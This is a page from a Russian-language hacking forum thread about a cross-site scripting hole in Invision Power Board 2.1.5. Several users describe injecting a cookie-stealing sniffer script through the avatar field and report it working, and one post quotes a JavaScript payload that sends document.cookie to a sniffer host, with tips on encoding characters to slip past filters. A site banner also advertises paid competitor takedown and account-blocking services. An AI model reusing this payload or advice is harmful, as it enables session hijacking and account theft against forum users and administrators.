Invision 2.1.5 Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Invision 2.1.5 Xss

Страница 7 из 8

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#61

21.05.2006, 11:25

Darkwayder

Познающий

Регистрация: 20.05.2006

Сообщений: 41

С нами: 10514095

Репутация: 16

Лол на счёт снифера, на главноё странице античата есть он.

#62

21.05.2006, 12:04

m0nter

Новичок

Регистрация: 03.04.2006

Сообщений: 4

С нами: 10581417

Репутация: 5

Тока он не совсем рабочий, подписка - на мыло еще ни раз не пришло...
а через жалобу в 2,14 тоже не очень то получалось, то ли админы жалоб не читают

#63

21.05.2006, 16:06

x-ultra-x

Познающий

Регистрация: 05.10.2005

Сообщений: 76

С нами: 10840826

Репутация: 11

а если нет на форуме возможности залить авик по вебу?

#64

02.06.2006, 17:09

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

С нами: 10892546

Репутация: 2274

Хочк сказать всем огромное спасибо! Работает!

#65

07.06.2006, 11:45

Zver1992

Новичок

Регистрация: 07.06.2006

Сообщений: 5

С нами: 10487932

Репутация: 0

А как защищаться от этого? (xss в аватаре)

#66

28.10.2006, 22:02

GRAVER

Новичок

Регистрация: 27.10.2006

Сообщений: 5

С нами: 10283195

Репутация: -5

Вопрос снимается !!!!

Засунул скрипт от CinerX ( за что ему решпект и уважуха ) в аватарку и форумняк проглотил сказав - " Спасибо что всунили снифер " !!!!

НО !!! Я взял и вставил просто адрес снифера в автвру и он тоже его проглотил, будет ли работать в таком случае сниффер ???

Последний раз редактировалось GRAVER; 28.10.2006 в 22:27..

#67

29.10.2006, 12:36

GRAVER

Новичок

Регистрация: 27.10.2006

Сообщений: 5

С нами: 10283195

Репутация: -5

Мдя... не пашет снифер, точнее ничего толкового не вылавливает....

#68

29.10.2006, 13:01

Fr-Ron

Участник форума

Регистрация: 10.09.2006

Сообщений: 185

С нами: 10350730

Репутация: 337

Graver
Если ты в аватару просто адрес снифера засунул, то не удивительно...

#69

29.10.2006, 23:07

GRAVER

Новичок

Регистрация: 27.10.2006

Сообщений: 5

С нами: 10283195

Репутация: -5

Нет, я скрипт прописал, всё как по инстркуции - отред. html и всунул скрипт.

И ещё , он только админские куки крадёт или всех юзверов ?

#70

10.01.2007, 10:21

hpagof

Познающий

Регистрация: 05.10.2006

Сообщений: 87

С нами: 10314877

Репутация: 4

Цитата:

Сообщение от CinerX

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

http://адресс_снифера? ---- откудовы взять ?

Страница 7 из 8

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Invision 1.3 Xss ?	slider	Уязвимости CMS / форумов	6	01.06.2006 13:01
Уязвимость Invision Power Board 2.1.5	Go0o$E	Уязвимости CMS / форумов	106	05.05.2006 21:35
Active XSS in Invision Power Board 2.1.4	k00p3r	Уязвимости	8	03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final	rsha1988	Уязвимости CMS / форумов	12	15.02.2005 01:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход